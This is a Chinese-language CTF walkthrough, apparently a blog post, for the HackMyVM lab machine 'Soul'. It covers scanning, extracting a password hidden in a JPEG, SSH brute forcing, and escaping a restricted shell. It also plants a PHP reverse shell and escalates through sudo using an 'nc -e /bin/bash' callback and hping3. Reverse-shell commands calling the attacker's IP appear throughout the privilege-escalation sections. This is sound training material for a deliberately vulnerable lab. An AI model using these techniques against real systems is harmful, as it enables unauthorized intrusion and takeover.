{"id":861,"date":"2025-06-12T14:47:30","date_gmt":"2025-06-12T06:47:30","guid":{"rendered":"http:\/\/162.14.82.114\/?p=861"},"modified":"2025-06-12T14:47:30","modified_gmt":"2025-06-12T06:47:30","slug":"hmv-_-soul","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/861\/06\/12\/2025\/","title":{"rendered":"hmv[-_-]Soul"},"content":{"rendered":"

Soul<\/h1>\n

\"image-20250610235036787\"<\/div>
\n
\"image-20250612133222389\"<\/div><\/p>\n

\u4fe1\u606f\u641c\u96c6<\/h2>\n

\u7aef\u53e3\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'\n\nOpen 192.168.10.100:22\nOpen 192.168.10.100:80\n\nPORT   STATE SERVICE REASON         VERSION\n22\/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 8a:e9:c1:c2:a3:44:40:26:6f:22:37:c3:fe:a1:19:f2 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDGJNgXS1Y8r1JG8jaFNzS\/Y\/ML8jzfgtR7buUYaKzvqfP4CcvJH6ejIbteXqAYb0JWOCxqUDghA0ucEjTSV4OUzzGP3SfGgJZX7JNJ6csgXQYRB+L5Hdrv5RqsaqjI4gG0OAI5OsBqxhtxYS4izpP2gMSYQ7HynieyMwBc3LOEOrW0ho+ZnSkYulPHSZwOyPlcI9pCgZzIzthQQmb2zn\/zsYaQGSpZNDGHI0fBj6bduKyInHMzVVe1+73v\/KLYVZhqKU0p\/bz+8szInnX6HdOv3aM7vVFtblgYlm3qLdLNsZrHYd+wfG0U5M7CgmyM7C+E\/ckCisd991h2aBVG+f2R\n|   256 4f:4a:d6:47:1a:87:7e:69:86:7f:5e:11:5c:4f:f1:48 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKPZQ2pW7+Hr\/FDzx8kKgneF\/6ISNSEQIKNTk1LdQl9q5v7PVG3McVy9CH\/PZoUezPyg4foHwPM7Rv\/eUvNELFA=\n|   256 46:f4:2c:28:53:ef:4c:2b:70:f8:99:7e:39:64:ec:07 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILIgL7+gfaj8JIU6RzELvUf4KDr\/7Z+d50QX94u3Xv2E\n80\/tcp open  http    syn-ack ttl 64 nginx 1.14.2\n|_http-server-header: nginx\/1.14.2\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-title: Site doesn't have a title (text\/html).\nMAC Address: 08:00:27:99:A7:45 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n
\u76ee\u5f55\u626b\u63cf<\/h3>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php 2>\/dev\/null\n\n404      GET        7l       12w      169c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter\n200      GET        1l        2w       24c http:\/\/192.168.10.100\/index.html\n200      GET      745l     4020w   339891c http:\/\/192.168.10.100\/saint.jpg\n200      GET        1l        2w       24c http:\/\/192.168.10.100\/\n200      GET        1l        1w        9c http:\/\/192.168.10.100\/robots.txt\n[####################] - 8m    882188\/882188  0s      found:4       errors:0      \n[####################] - 8m    882184\/882184  1938\/s  http:\/\/192.168.10.100\/<\/code><\/pre>\n
\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n
\u8e29\u70b9<\/h3>\n
\"image-20250612133456630\"<\/div><\/p>\n
 <img src="saint.jpg"> <\/code><\/pre>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul]\n\u2514\u2500$ curl -s http:\/\/192.168.10.100\/robots.txt                          \n\/nothing\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul]\n\u2514\u2500$ curl -s http:\/\/192.168.10.100\/nothing   \n<html>\n<head><title>404 Not Found<\/title><\/head>\n<body bgcolor="white">\n<center><h1>404 Not Found<\/h1><\/center>\n<hr><center>nginx\/1.14.2<\/center>\n<\/body>\n<\/html>\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul]\n\u2514\u2500$ wget http:\/\/192.168.10.100\/saint.jpg   \n--2025-06-12 01:36:25--  http:\/\/192.168.10.100\/saint.jpg\nConnecting to 192.168.10.100:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 190523 (186K) [image\/jpeg]\nSaving to: \u2018saint.jpg\u2019\n\nsaint.jpg                                       100%[====================================================================================================>] 186.06K  --.-KB\/s    in 0.03s   \n\n2025-06-12 01:36:25 (5.40 MB\/s) - \u2018saint.jpg\u2019 saved [190523\/190523]\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul]\n\u2514\u2500$ exiftool saint.jpg \nExifTool Version Number         : 13.25\nFile Name                       : saint.jpg\nDirectory                       : .\nFile Size                       : 191 kB\nFile Modification Date\/Time     : 2020:11:26 05:28:37-05:00\nFile Access Date\/Time           : 2025:06:12 01:36:25-04:00\nFile Inode Change Date\/Time     : 2025:06:12 01:36:25-04:00\nFile Permissions                : -rw-rw-r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image\/jpeg\nJFIF Version                    : 1.01\nResolution Unit                 : inches\nX Resolution                    : 300\nY Resolution                    : 300\nImage Width                     : 1280\nImage Height                    : 838\nEncoding Process                : Baseline DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components                : 3\nY Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)\nImage Size                      : 1280x838\nMegapixels                      : 1.1\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt saint.jpg \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Found passphrase: ""\n[i] Original filename: "pass.txt".\n[i] Extracting to "saint.jpg.out".\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul]\n\u2514\u2500$ cat saint.jpg.out \nlionsarebigcats<\/code><\/pre>\n
\u7206\u7834<\/h3>\n
\u8fd9\u753b\u770b\u4e0a\u53bb\u5c31\u5f88\u6709\u540d\uff0c\u5c1d\u8bd5google\u4e00\u4e0b\uff1a<\/p>\n
\"image-20250612135501936\"<\/div>
\n
\"image-20250612135704002\"<\/div><\/p>\n
\u53ef\u4ee5\u786e\u5b9a\u4e00\u4e9b\u5173\u952e\u8bcd\uff1a<\/p>\n
B. Pratt\nDaniel\nB\nPratt\nb\npratt\ndaniel\nbpratt<\/code><\/pre>\n
\u5c1d\u8bd5\u8fdb\u884c\u7206\u7834\uff0c\u5bc6\u7801\u5b9a\u4e3alionsarebigcats<\/code>\uff1a<\/p>\n
\"image-20250612135916626\"<\/div>
\n
\"image-20250612140026755\"<\/div><\/p>\n
\u63d0\u6743<\/h2>\n
\u4fe1\u606f\u641c\u96c6\u4ee5\u53ca\u7a33\u5b9ashell<\/h3>\n
daniel@soul:~$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for daniel: \nSorry, user daniel may not run sudo on soul.\ndaniel@soul:~$ ls -la\ntotal 24\ndrwxr-xr-x 2 daniel daniel 4096 Nov 26  2020 .\ndrwxr-xr-x 5 root   root   4096 Nov 26  2020 ..\n-rw-r--r-- 1 daniel daniel  220 Nov 26  2020 .bash_logout\n-rw-r--r-- 1 daniel daniel 3526 Nov 26  2020 .bashrc\n-rw-r--r-- 1 daniel daniel  807 Nov 26  2020 .profile\n-rw------- 1 daniel daniel   50 Nov 26  2020 .Xauthority\ndaniel@soul:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n-rbash: \/dev\/null: restricted: cannot redirect output\ndaniel@soul:~$ echo $SHELL\n\/usr\/bin\/rbash<\/code><\/pre>\n
\u9700\u8981\u7a33\u5b9ashell\uff0c\u5c1d\u8bd5\u76f4\u63a5\u53cd\u5f39\u5230pwncat-cs<\/code>\u8fdb\u884c\u81ea\u52a8\u5c1d\u8bd5\uff1a<\/p>\n
\"image-20250612140325447\"<\/div><\/p>\n
\u4f46\u662f\u5931\u8d25\u4e86\uff0c\u5c1d\u8bd5\u539f\u6709\u7684shell\u8fdb\u884c\u64cd\u4f5c\u5427\uff1a<\/p>\n
daniel@soul:~$ bash\ndaniel@soul:~$ echo $SHELL\n\/usr\/bin\/rbash\ndaniel@soul:~$ ls -la\ntotal 24\ndrwxr-xr-x 2 daniel daniel 4096 Nov 26  2020 .\ndrwxr-xr-x 5 root   root   4096 Nov 26  2020 ..\n-rw-r--r-- 1 daniel daniel  220 Nov 26  2020 .bash_logout\n-rw-r--r-- 1 daniel daniel 3526 Nov 26  2020 .bashrc\n-rw-r--r-- 1 daniel daniel  807 Nov 26  2020 .profile\n-rw------- 1 daniel daniel   50 Nov 26  2020 .Xauthority\ndaniel@soul:~$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\ndaniel\nsshd\ngabriel\npeter\ndaniel@soul:~$ ls -la \/home\ntotal 20\ndrwxr-xr-x  5 root    root    4096 Nov 26  2020 .\ndrwxr-xr-x 18 root    root    4096 Nov 26  2020 ..\ndrwxr-xr-x  2 daniel  daniel  4096 Nov 26  2020 daniel\ndrwxr-xr-x  3 gabriel gabriel 4096 Nov 26  2020 gabriel\ndrwxr-xr-x  3 peter   peter   4096 Nov 26  2020 peter\ndaniel@soul:~$ busybox find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/su\n\/usr\/bin\/passwd\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/sbin\/agetty\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/eject\/dmcrypt-get-device\ndaniel@soul:~$ ls -la \/usr\/sbin\/agetty\n-rwsrws--- 1 root peter 64744 Jan 10  2019 \/usr\/sbin\/agetty<\/code><\/pre>\n
\u53d1\u73b0\u73b0\u6210\u7684\u63d0\u6743\u6f0f\u6d1e\uff1ahttps:\/\/gtfobins.github.io\/gtfobins\/agetty\/#suid<\/a> \u4f46\u662f\u53ef\u60dc\u54b1\u4eec\u6ca1\u6743\u9650\u6267\u884c\u3002\u3002\u3002<\/p>\n
daniel@soul:~$ busybox find \/ -user daniel -type f 2>\/dev\/null | busybox grep -v proc | busybox grep -v sys\n\/home\/daniel\/.bashrc\n\/home\/daniel\/.bash_history\n\/home\/daniel\/.bash_logout\n\/home\/daniel\/.Xauthority\n\/home\/daniel\/.profile\n\/var\/www\/html\/saint.jpg\n\ndaniel@soul:~$ busybox find \/ -group daniel -type f 2>\/dev\/null | busybox grep -v proc | busybox grep -v sys\n\/home\/daniel\/.bashrc\n\/home\/daniel\/.bash_history\n\/home\/daniel\/.bash_logout\n\/home\/daniel\/.Xauthority\n\/home\/daniel\/.profile\n\/var\/www\/html\/saint.jpg\n\/var\/lib\/sudo\/lectured\/daniel<\/code><\/pre>\n
\u83b7\u53d6webshell<\/h3>\n
\u6253\u5f00\u7f51\u7ad9\uff0c\u53d1\u73b0\u6743\u9650\u4e00\u5e94\u4ff1\u5168\uff0c\u5c1d\u8bd5\u53cd\u5f39webshell<\/code>\u83b7\u53d6www-data<\/code>\u7528\u6237\uff0c\u770b\u770b\u6709\u6ca1\u6709\u4e1c\u897f\uff1a<\/p>\n
daniel@soul:~$ cd \/var\/www\/html\ndaniel@soul:\/var\/www\/html$ ls -la\ntotal 208\ndrwxrwxrwx 2 root   root     4096 Nov 26  2020 .\ndrwxr-xr-x 3 root   root     4096 Nov 26  2020 ..\n-rwxrwxrwx 1 root   root       24 Nov 26  2020 index.html\n-rwxrwxrwx 1 root   root      612 Nov 26  2020 index.nginx-debian.html\n-rwxrwxrwx 1 root   root        9 Nov 26  2020 robots.txt\n-rwxrwxrwx 1 daniel daniel 190523 Nov 26  2020 saint.jpg\ndaniel@soul:\/var\/www\/html$ cat index.nginx-debian.html \n<!DOCTYPE html>\n<html>\n<head>\n<title>Welcome to nginx!<\/title>\n<style>\n    body {\n        width: 35em;\n        margin: 0 auto;\n        font-family: Tahoma, Verdana, Arial, sans-serif;\n    }\n<\/style>\n<\/head>\n<body>\n<h1>Welcome to nginx!<\/h1>\n<p>If you see this page, the nginx web server is successfully installed and\nworking. Further configuration is required.<\/p>\n\n<p>For online documentation and support please refer to\n<a href="http:\/\/nginx.org\/">nginx.org<\/a>.<br\/>\nCommercial support is available at\n<a href="http:\/\/nginx.com\/">nginx.com<\/a>.<\/p>\n\n<p><em>Thank you for using nginx.<\/em><\/p>\n<\/body>\n<\/html>\ndaniel@soul:\/var\/www\/html$ vi webshell.php\ndaniel@soul:\/var\/www\/html$ head webshell.php \n\n  <?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = "1.0";\n  $ip = '192.168.10.106';  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  $chunk_size = 1400;\ndaniel@soul:\/var\/www\/html$ chmod +x webshell.php<\/code><\/pre>\n
\u76d1\u542c\u540e\u5c1d\u8bd5\u6fc0\u6d3b\uff0c\u4f46\u662f\u53d1\u73b0\u672a\u88ab\u89e3\u6790\uff0c\u770b\u4e00\u4e0b\u76f8\u5173\u914d\u7f6e\u6587\u4ef6\uff1a<\/p>\n
daniel@soul:\/var\/www\/html$ cd \/etc\/nginx\/\ndaniel@soul:\/etc\/nginx$ ls -la\ntotal 72\ndrwxr-xr-x  8 root root 4096 Nov 26  2020 .\ndrwxr-xr-x 73 root root 4096 Jun 12 02:18 ..\ndrwxr-xr-x  2 root root 4096 Aug 24  2020 conf.d\n-rw-r--r--  1 root root 1077 Aug 24  2020 fastcgi.conf\n-rw-r--r--  1 root root 1007 Aug 24  2020 fastcgi_params\n-rw-r--r--  1 root root 2837 Aug 24  2020 koi-utf\n-rw-r--r--  1 root root 2223 Aug 24  2020 koi-win\n-rw-r--r--  1 root root 3957 Aug 24  2020 mime.types\ndrwxr-xr-x  2 root root 4096 Aug 24  2020 modules-available\ndrwxr-xr-x  2 root root 4096 Nov 26  2020 modules-enabled\n-rw-r--r--  1 root root 1482 Aug 24  2020 nginx.conf\n-rw-r--r--  1 root root  180 Aug 24  2020 proxy_params\n-rw-r--r--  1 root root  636 Aug 24  2020 scgi_params\ndrwxr-xr-x  2 root root 4096 Nov 26  2020 sites-available\ndrwxr-xr-x  2 root root 4096 Nov 26  2020 sites-enabled\ndrwxr-xr-x  2 root root 4096 Nov 26  2020 snippets\n-rw-r--r--  1 root root  664 Aug 24  2020 uwsgi_params\n-rw-r--r--  1 root root 3071 Aug 24  2020 win-utf\ndaniel@soul:\/etc\/nginx$ cat nginx.conf \nuser www-data;\nworker_processes auto;\npid \/run\/nginx.pid;\ninclude \/etc\/nginx\/modules-enabled\/*.conf;\n\nevents {\n        worker_connections 768;\n        # multi_accept on;\n}\n\nhttp {\n\n        ##\n        # Basic Settings\n        ##\n\n        sendfile on;\n        tcp_nopush on;\n        tcp_nodelay on;\n        keepalive_timeout 65;\n        types_hash_max_size 2048;\n        # server_tokens off;\n\n        # server_names_hash_bucket_size 64;\n        # server_name_in_redirect off;\n\n        include \/etc\/nginx\/mime.types;\n        default_type application\/octet-stream;\n\n        ##\n        # SSL Settings\n        ##\n\n        ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE\n        ssl_prefer_server_ciphers on;\n\n        ##\n        # Logging Settings\n        ##\n\n        access_log \/var\/log\/nginx\/access.log;\n        error_log \/var\/log\/nginx\/error.log;\n\n        ##\n        # Gzip Settings\n        ##\n\n        gzip on;\n\n        # gzip_vary on;\n        # gzip_proxied any;\n        # gzip_comp_level 6;\n        # gzip_buffers 16 8k;\n        # gzip_http_version 1.1;\n        # gzip_types text\/plain text\/css application\/json application\/javascript text\/xml application\/xml application\/xml+rss text\/javascript;\n\n        ##\n        # Virtual Host Configs\n        ##\n\n        include \/etc\/nginx\/conf.d\/*.conf;\n        include \/etc\/nginx\/sites-enabled\/*;\n}\n\n#mail {\n#       # See sample authentication script at:\n#       # http:\/\/wiki.nginx.org\/ImapAuthenticateWithApachePhpScript\n# \n#       # auth_http localhost\/auth.php;\n#       # pop3_capabilities "TOP" "USER";\n#       # imap_capabilities "IMAP4rev1" "UIDPLUS";\n# \n#       server {\n#               listen     localhost:110;\n#               protocol   pop3;\n#               proxy      on;\n#       }\n# \n#       server {\n#               listen     localhost:143;\n#               protocol   imap;\n#               proxy      on;\n#       }\n#}<\/code><\/pre>\n
\u63a5\u7740\u67e5\u770b\/etc\/nginx\/sites-enabled\/<\/code>\uff1a<\/p>\n
daniel@soul:\/etc\/nginx\/sites-enabled$ ls -la\ntotal 8\ndrwxr-xr-x 2 root root 4096 Nov 26  2020 .\ndrwxr-xr-x 8 root root 4096 Nov 26  2020 ..\nlrwxrwxrwx 1 root root   34 Nov 26  2020 default -> \/etc\/nginx\/sites-available\/default\ndaniel@soul:\/etc\/nginx\/sites-enabled$ cat default \n##\n# You should look at the following URL's in order to grasp a solid understanding\n# of Nginx configuration files in order to fully unleash the power of Nginx.\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/topics\/tutorials\/config_pitfalls\/\n# https:\/\/wiki.debian.org\/Nginx\/DirectoryStructure\n#\n# In most cases, administrators will remove this file from sites-enabled\/ and\n# leave it as reference inside of sites-available where it will continue to be\n# updated by the nginx packaging team.\n#\n# This file will automatically load configuration files provided by other\n# applications, such as Drupal or WordPress. These applications will be made\n# available underneath a path with that package name, such as \/drupal8.\n#\n# Please see \/usr\/share\/doc\/nginx-doc\/examples\/ for more detailed examples.\n##\n\n# Default server configuration\n#\nserver {\n        listen 80 default_server;\n        listen [::]:80 default_server;\n\n        # SSL configuration\n        #\n        # listen 443 ssl default_server;\n        # listen [::]:443 ssl default_server;\n        #\n        # Note: You should disable gzip for SSL traffic.\n        # See: https:\/\/bugs.debian.org\/773332\n        #\n        # Read up on ssl_ciphers to ensure a secure configuration.\n        # See: https:\/\/bugs.debian.org\/765782\n        #\n        # Self signed certs generated by the ssl-cert package\n        # Don't use them in a production server!\n        #\n        # include snippets\/snakeoil.conf;\n\n        root \/var\/www\/html;\n\n        # Add index.php to the list if you are using PHP\n        index index.html index.htm index.nginx-debian.html;\n\n        server_name _;\n\n        location \/ {\n                # First attempt to serve request as file, then\n                # as directory, then fall back to displaying a 404.\n                try_files $uri $uri\/ =404;\n        }\n\n        # pass PHP scripts to FastCGI server\n        #\n        #location ~ \\.php$ {\n        #       include snippets\/fastcgi-php.conf;\n        #\n        #       # With php-fpm (or other unix sockets):\n        #       fastcgi_pass unix:\/run\/php\/php7.3-fpm.sock;\n        #       # With php-cgi (or other tcp sockets):\n        #       fastcgi_pass 127.0.0.1:9000;\n        #}\n\n        # deny access to .htaccess files, if Apache's document root\n        # concurs with nginx's one\n        #\n        #location ~ \/\\.ht {\n        #       deny all;\n        #}\n}\n\n##\n# You should look at the following URL's in order to grasp a solid understanding\n# of Nginx configuration files in order to fully unleash the power of Nginx.\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/topics\/tutorials\/config_pitfalls\/\n# https:\/\/wiki.debian.org\/Nginx\/DirectoryStructure\n#\n# In most cases, administrators will remove this file from sites-enabled\/ and\n# leave it as reference inside of sites-available where it will continue to be\n# updated by the nginx packaging team.\n#\n# This file will automatically load configuration files provided by other\n# applications, such as Drupal or WordPress. These applications will be made\n# available underneath a path with that package name, such as \/drupal8.\n#\n# Please see \/usr\/share\/doc\/nginx-doc\/examples\/ for more detailed examples.\n##\n\n##\n# You should look at the following URL's in order to grasp a solid understanding\n# of Nginx configuration files in order to fully unleash the power of Nginx.\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/topics\/tutorials\/config_pitfalls\/\n# https:\/\/wiki.debian.org\/Nginx\/DirectoryStructure\n#\n# In most cases, administrators will remove this file from sites-enabled\/ and\n# leave it as reference inside of sites-available where it will continue to be\n# updated by the nginx packaging team.\n#\n# This file will automatically load configuration files provided by other\n# applications, such as Drupal or WordPress. These applications will be made\n# available underneath a path with that package name, such as \/drupal8.\n#\n# Please see \/usr\/share\/doc\/nginx-doc\/examples\/ for more detailed examples.\n##\n\n# Virtual Host configuration for example.com\n#\n# You can move that to a different file under sites-available\/ and symlink that\n# to sites-enabled\/ to enable it.\n#\nserver {\n        listen 80;\n        listen [::]:80;\n#\n        server_name lonelysoul.hmv;\n#\n        root \/var\/www\/html;\n        index index.html;\n#\n        location \/ {\n                try_files $uri $uri\/ =404;\n        }\n\n # pass PHP scripts to FastCGI server\n        #\n               location ~ \\.php$ {\n               include snippets\/fastcgi-php.conf;\n        #\n        #       # With php-fpm (or other unix sockets):\n               fastcgi_pass unix:\/run\/php\/php7.3-fpm.sock;\n        #       # With php-cgi (or other tcp sockets):\n        #       fastcgi_pass 127.0.0.1:9000;\n        }\n}<\/code><\/pre>\n
\u53d1\u73b0\u5f88\u660e\u663e\uff0c\u666e\u901a\u8def\u7531\u4e0d\u4f1a\u5c06\u6587\u4ef6\u4f20\u7ed9FastCGI server<\/code>\u89e3\u6790\uff0c\u4f46\u662flonelysoul.hmv<\/code>\u7684\u8def\u7531\u4f1a\u4f20\u9012\u8fdb\u884c\u89e3\u6790\uff0c\u6240\u4ee5\u6211\u4eec\u53ea\u9700\u8981\u505a\u4e00\u4e2a\u57df\u540d\u89e3\u6790\u518d\u5c1d\u8bd5\u8bbf\u95ee\u5373\u53ef\uff01<\/p>\n
192.168.10.100  lonelysoul.hmv<\/code><\/pre>\n
\u5c1d\u8bd5\u6fc0\u6d3b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Soul]\n\u2514\u2500$ curl -s http:\/\/lonelysoul.hmv\/webshell.php<\/code><\/pre>\n
\"image-20250612143617576\"<\/div><\/p>\n
\u63d0\u6743gabriel<\/h3>\n
(remote) www-data@soul:\/$ cd ~\n(remote) www-data@soul:\/var\/www$ sudo -l\nMatching Defaults entries for www-data on soul:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on soul:\n    (gabriel) NOPASSWD: \/tmp\/whoami\n(remote) www-data@soul:\/var\/www$ cat \/tmp\/whoami\ncat: \/tmp\/whoami: No such file or directory\n(remote) www-data@soul:\/var\/www$ cd \/tmp\n(remote) www-data@soul:\/tmp$ ls -la\ntotal 32\ndrwxrwxrwt  8 root root 4096 Jun 12 02:09 .\ndrwxr-xr-x 18 root root 4096 Nov 26  2020 ..\ndrwxrwxrwt  2 root root 4096 Jun 12 01:31 .ICE-unix\ndrwxrwxrwt  2 root root 4096 Jun 12 01:31 .Test-unix\ndrwxrwxrwt  2 root root 4096 Jun 12 01:31 .X11-unix\ndrwxrwxrwt  2 root root 4096 Jun 12 01:31 .XIM-unix\ndrwxrwxrwt  2 root root 4096 Jun 12 01:31 .font-unix\ndrwx------  3 root root 4096 Jun 12 01:31 systemd-private-d1d32f236a414475a274f8e1311ae999-systemd-timesyncd.service-1oMFsR<\/code><\/pre>\n
\u5929\u52a9\u6211\u4e5f\uff0c\u4ee5\u7528\u6237\u6743\u9650\u6267\u884c\u53ef\u81ea\u5b9a\u4e49\u7684\u6076\u610f\u4ee3\u7801\uff01\uff01\uff01<\/p>\n
(remote) www-data@soul:\/tmp$ echo 'nc -e \/bin\/bash 192.168.10.106 2345' > whoami\n(remote) www-data@soul:\/tmp$ chmod +x whoami\n(remote) www-data@soul:\/tmp$ sudo -u gabriel \/tmp\/whoami\nstty: 'standard input': Inappropriate ioctl for device\nbash: line 12: ifconfig: command not found\n<\/code><\/pre>\n
\u53e6\u4e00\u8fb9\u53d1\u73b0\u5f39\u8fc7\u6765\u4e86\uff01\uff01\uff01\uff01<\/p>\n
\"image-20250612143930157\"<\/div><\/p>\n
\u63d0\u6743peter<\/h3>\n
(remote) gabriel@soul:\/home\/gabriel$ sudo -l\nMatching Defaults entries for gabriel on soul:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser gabriel may run the following commands on soul:\n    (peter) NOPASSWD: \/usr\/sbin\/hping3\n(remote) gabriel@soul:\/home\/gabriel$ cat user.txt \nHMViwazhere\n(remote) gabriel@soul:\/home\/gabriel$ \/usr\/sbin\/hping3 -h\nusage: hping3 host [options]\n  -h  --help      show this help\n  -v  --version   show version\n  -c  --count     packet count\n  -i  --interval  wait (uX for X microseconds, for example -i u1000)\n      --fast      alias for -i u10000 (10 packets for second)\n      --faster    alias for -i u1000 (100 packets for second)\n      --flood      sent packets as fast as possible. Don't show replies.\n  -n  --numeric   numeric output\n  -q  --quiet     quiet\n  -I  --interface interface name (otherwise default routing interface)\n  -V  --verbose   verbose mode\n  -D  --debug     debugging info\n  -z  --bind      bind ctrl+z to ttl           (default to dst port)\n  -Z  --unbind    unbind ctrl+z\n      --beep      beep for every matching packet received\nMode\n  default mode     TCP\n  -0  --rawip      RAW IP mode\n  -1  --icmp       ICMP mode\n  -2  --udp        UDP mode\n  -8  --scan       SCAN mode.\n                   Example: hping --scan 1-30,70-90 -S www.target.host\n  -9  --listen     listen mode\nIP\n  -a  --spoof      spoof source address\n  --rand-dest      random destionation address mode. see the man.\n  --rand-source    random source address mode. see the man.\n  -t  --ttl        ttl (default 64)\n  -N  --id         id (default random)\n  -W  --winid      use win* id byte ordering\n  -r  --rel        relativize id field          (to estimate host traffic)\n  -f  --frag       split packets in more frag.  (may pass weak acl)\n  -x  --morefrag   set more fragments flag\n  -y  --dontfrag   set don't fragment flag\n  -g  --fragoff    set the fragment offset\n  -m  --mtu        set virtual mtu, implies --frag if packet size > mtu\n  -o  --tos        type of service (default 0x00), try --tos help\n  -G  --rroute     includes RECORD_ROUTE option and display the route buffer\n  --lsrr           loose source routing and record route\n  --ssrr           strict source routing and record route\n  -H  --ipproto    set the IP protocol field, only in RAW IP mode\nICMP\n  -C  --icmptype   icmp type (default echo request)\n  -K  --icmpcode   icmp code (default 0)\n      --force-icmp send all icmp types (default send only supported types)\n      --icmp-gw    set gateway address for ICMP redirect (default 0.0.0.0)\n      --icmp-ts    Alias for --icmp --icmptype 13 (ICMP timestamp)\n      --icmp-addr  Alias for --icmp --icmptype 17 (ICMP address subnet mask)\n      --icmp-help  display help for others icmp options\nUDP\/TCP\n  -s  --baseport   base source port             (default random)\n  -p  --destport   [+][+]<port> destination port(default 0) ctrl+z inc\/dec\n  -k  --keep       keep still source port\n  -w  --win        winsize (default 64)\n  -O  --tcpoff     set fake tcp data offset     (instead of tcphdrlen \/ 4)\n  -Q  --seqnum     shows only tcp sequence number\n  -b  --badcksum   (try to) send packets with a bad IP checksum\n                   many systems will fix the IP checksum sending the packet\n                   so you'll get bad UDP\/TCP checksum instead.\n  -M  --setseq     set TCP sequence number\n  -L  --setack     set TCP ack\n  -F  --fin        set FIN flag\n  -S  --syn        set SYN flag\n  -R  --rst        set RST flag\n  -P  --push       set PUSH flag\n  -A  --ack        set ACK flag\n  -U  --urg        set URG flag\n  -X  --xmas       set X unused flag (0x40)\n  -Y  --ymas       set Y unused flag (0x80)\n  --tcpexitcode    use last tcp->th_flags as exit code\n  --tcp-mss        enable the TCP MSS option with the given value\n  --tcp-timestamp  enable the TCP timestamp option to guess the HZ\/uptime\nCommon\n  -d  --data       data size                    (default is 0)\n  -E  --file       data from file\n  -e  --sign       add 'signature'\n  -j  --dump       dump packets in hex\n  -J  --print      dump printable characters\n  -B  --safe       enable 'safe' protocol\n  -u  --end        tell you when --file reached EOF and prevent rewind\n  -T  --traceroute traceroute mode              (implies --bind and --ttl 1)\n  --tr-stop        Exit when receive the first not ICMP in traceroute mode\n  --tr-keep-ttl    Keep the source TTL fixed, useful to monitor just one hop\n  --tr-no-rtt       Don't calculate\/show RTT information in traceroute mode\nARS packet description (new, unstable)\n  --apd-send       Send the packet described with APD (see docs\/APD.txt)<\/code><\/pre>\n
\u53d1\u73b0\u662f\u73b0\u6210\u6f0f\u6d1e\uff1ahttps:\/\/gtfobins.github.io\/gtfobins\/hping3\/#sudo<\/a><\/p>\n
sudo hping3\n\/bin\/sh<\/code><\/pre>\n
\"image-20250612144155402\"<\/div><\/p>\n
\u63d0\u6743root<\/h3>\n
